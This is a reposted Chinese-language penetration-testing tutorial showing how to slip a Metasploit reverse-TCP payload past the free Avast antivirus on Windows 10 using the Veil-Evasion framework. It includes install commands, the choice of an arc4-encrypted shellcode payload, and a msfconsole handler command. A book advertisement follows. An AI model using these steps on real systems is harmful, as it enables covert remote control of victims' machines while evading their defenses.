内容简介:在进行渗透测试的过程中,绕过反病毒产品一直是一个“令人头疼”的事情。今天,我们将跟大家如何绕过目前市面上大部分的免费反病毒产品。由于很多新手用户喜欢使用AVAST或AVG这样的轻量级的不占用太多系统资源的反病毒产品,因此我们的实验环境使用免费的AVAST反病毒软件,运行系统为Windows 10。
在进行渗透测试的过程中,绕过反病毒产品一直是一个“令人头疼”的事情。今天,我们将跟大家如何绕过目前市面上大部分的免费反病毒产品。
由于很多新手用户喜欢使用AVAST或AVG这样的轻量级的不占用太多系统资源的反病毒产品,因此我们的实验环境使用免费的AVAST反病毒软件,运行系统为Windows 10。
测试工具
1、 Kali 2、 Veil框架 3、 Windows 10 4、 AVAST
Veil框架是一款很老的杀软绕过 工具 了,它可以生成几乎不可检测的Payload,而且Veil还可以通过命令行终端安装和运行:
apt-get-y install git clone https://github.com/Veil-Framework/Veil-Evasion.git cd Veil-Evasion/ cd setup setup.sh-c
详细信息请参考该项目的GitHub主页:【 传送门 】
第一步
在Kali主机上打开命令行窗口,并切换到Veil框架目录中,然后输入:
#python veil-evasion.py
第二步
使用list命令列出所有可用的命令,检查Veil框架提供的可用Payload:
第三步
选择编号37的Payload-“python/shellcode_inject/arc_encrypt”。这个Shellcode使用了arc4加密算法进行加密,并使用内存中的一个密钥文件进行解密。
我们可以使用info命令来查看相关信息,然后使用SET命令来使用phyrion解密器:
SET USE_PHYRION Y
第四步
输入命令生成Payload,默认选择使用msfvenmon。这里我使用的是默认的reverse_tcphandler,并填写了 Kali Linux 主机的LHOST和LPORT。
第五步
Payload成功生成之后,工具会显示Payload的生成地址以及msf的Handler文件地址。接下来,输入下列命令:
#msfconsole -r /usr/share/veil-output/handlers/payload_handler.rc
第六步
接下来,把我们生成的Payload拷贝到Windows主机中,然后执行Payload,我们这里测试的是最新版本的Avast。
演示视频
大家可以从视频中看到,Payload在执行之后Avast不会弹出任何的警告提示。
视频地址: https://youtu.be/J8CtWWeBuXA
* 参考来源: gbhackers ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
离心力:互联网历史与数字化未来
[英] 乔尼·赖安(Johnny Ryan) / 段铁铮 / 译言·东西文库/电子工业出版社 / 2018-2-1 / 68.00元
★一部详实、严谨的互联网史著作; ★哈佛、斯坦福等高校学生必读书目; ★《互联网的未来》作者乔纳森·L. 齐特雷恩,《独立报》《爱尔兰时报》等知名作者和国外媒体联合推荐。 【内容简介】 虽然互联网从诞生至今,不过是五六十年,但我们已然有必要整理其丰富的历史。未来的数字世界不仅取决于我 们的设想,也取决于它的发展历程,以及互联网伟大先驱们的理想和信念。 本书作者乔尼· ......一起来看看 《离心力:互联网历史与数字化未来》 这本书的介绍吧!